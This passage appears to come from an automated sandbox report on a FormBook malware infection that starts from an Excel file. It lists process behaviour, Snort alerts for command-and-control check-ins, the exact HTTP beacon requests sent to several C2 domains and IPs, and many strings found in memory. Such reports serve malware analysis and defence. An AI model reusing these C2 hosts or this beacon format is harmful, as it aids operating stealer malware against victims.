          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C34005
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C3C2FF
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 4x nop then pop esi6_2_00415834
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 4x nop then pop edi6_2_004162DD
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 4x nop then pop edi6_1_004162DD
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 4x nop then pop esi6_1_00415834
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi10_2_000962DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop esi10_2_00095834
          Source: global trafficDNS query: name: cdn.discordapp.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.159.130.233:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.159.130.233:443

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 23.228.109.141:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 23.228.109.141:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 23.228.109.141:80
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.land-il.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=BfKEObTbW9oeHG2CUMZ3KrmdYmDHtBO1kpWmA720me2b6REnQWjK/QX53PULeTYyqxmJdg==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.fsjinhua.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=D+cSBfecKrY0H0Gt53ME+eVK9rvQq54hSBUKdB1Y0k0nsfYDitv2SyHvmR9bpLZA/9+mqA==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.chenangopistolpermit.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.streamelemeants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.mct.ltdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.bmtxm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewIP Address: 81.17.18.195 81.17.18.195
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\205620C7.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.land-il.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=BfKEObTbW9oeHG2CUMZ3KrmdYmDHtBO1kpWmA720me2b6REnQWjK/QX53PULeTYyqxmJdg==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.fsjinhua.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=D+cSBfecKrY0H0Gt53ME+eVK9rvQq54hSBUKdB1Y0k0nsfYDitv2SyHvmR9bpLZA/9+mqA==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.chenangopistolpermit.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.streamelemeants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.mct.ltdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.bmtxm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Jan 2021 06:17:46 GMTServer: nginx/1.19.5Content-Type: text/html; charset=iso-8859-1Content-Length: 315host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: acqyswhf.exe, 00000005.00000002.2173902318.0000000003647000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2182020707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: acqyswhf.exe, 00000005.00000002.2173902318.0000000003647000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2182020707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, vbc.exe, 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2181107481.0000000001CD0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2380577544.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
